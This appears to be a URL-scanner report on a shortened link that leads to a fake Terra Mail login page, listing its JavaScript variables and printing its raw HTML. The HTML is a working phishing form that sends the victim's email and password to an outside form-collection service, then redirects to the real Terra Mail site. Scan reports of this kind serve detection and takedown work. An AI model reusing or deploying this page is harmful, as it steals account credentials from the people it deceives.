https://sac.conectar-terra.online/conectar/terra/

Submitted URL:
https://encurtador.com.br/elvl6Redirected
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 7 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
submitLoginfunction
clearErrorMessagefunction
showErrorMessagefunction
user_inputobject

Console log messages · 1 found

Messages logged to the web console

TypeCategoryLog
verbosedom
URL
https://sac.conectar-terra.online/conectar/terra/
Text
[DOM] Input elements should have autocomplete attributes (suggested: "current-password"): (More info: https://goo.gl/9p2vKq) %o

HTML

The raw HTML body of the page

<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAYklEQVR4Ac2TAQYAIRQFg7X33EPsXTpWl+gaL+GRTPIFYfAwI6ok6YhbAjkpjAP1f/uIyuqeAx4heQ5whGUOcIRlDnCE5P0Jyvc4Mm4OgGxoQ4DkNXwLLO8j8kuMyOaez9QA4IbAiExvUnkAAAAASUVORK5CYII=">
    <title>Terra Mail</title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f0f0f0;
            font-family: Arial, sans-serif;
        }
        .login-container {
            background-color: white;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            width: 300px;
            text-align: center;
        }
        .login-container img {
            width: 150px;
            margin-bottom: 20px;
        }
        .login-container input {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
        }
        .login-container input[type="submit"] {
            background-color: #ff7212;
            color: white;
            border: none;
            cursor: pointer;
        }
        .login-container input[type="submit"]:hover {
            background-color: #ff7212;
        }
        .icon-placeholder {
            position: absolute;
            margin-left: -25px;
            margin-top: 15px;
        }

    </style>
</head>
<body>
    <div class="login-container">

        <img src="https://upload.wikimedia.org/wikipedia/commons/3/31/Logotipo_terra_2022.png" alt="Terra">

        <form class="frm-shoppingmodule" action="https://api.staticforms.xyz/submit" method="post">

        <input type="hidden" name="accessKey" value="e32be9bc-4c04-48e4-b02b-a38730e02b17">

        <div style="position: relative;">

        <input type="email" name="email" id="username" placeholder="@Terra.com.br" required="">
        </div>

        <input type="password" name="name" id="password" placeholder="Senha" required="">

        <input type="hidden" name="redirectTo" value="https://mail.terra.com.br/">

         <input type="submit" value="ENTRAR">

        </form>

    </div>

<script>
                    function submitLogin() {
                      var captcha_aws = $(
                        "#id_captcha input#brand_cap_answer"
                      ).val();
                      var captcha_chg = $(
                        "#id_captcha input#brand_cap_challenge"
                      ).val();
                      secondLogin.send(
                        $("#formLogin input[name=username]").val(),
                        $("#formLogin input[name=password]").val(),
                        captcha_aws,
                        captcha_chg
                      );
                    }

                    function clearErrorMessage() {
                      $(".bxloginErro span").remove();
                    }

                    function showErrorMessage(message) {
                      clearErrorMessage();
                      $(".bxloginErro").append("<span>" + message + "</span>");
                    }
                    var user_input = document.getElementById("username");
                    user_input.focus();
                  </script>






</body></html>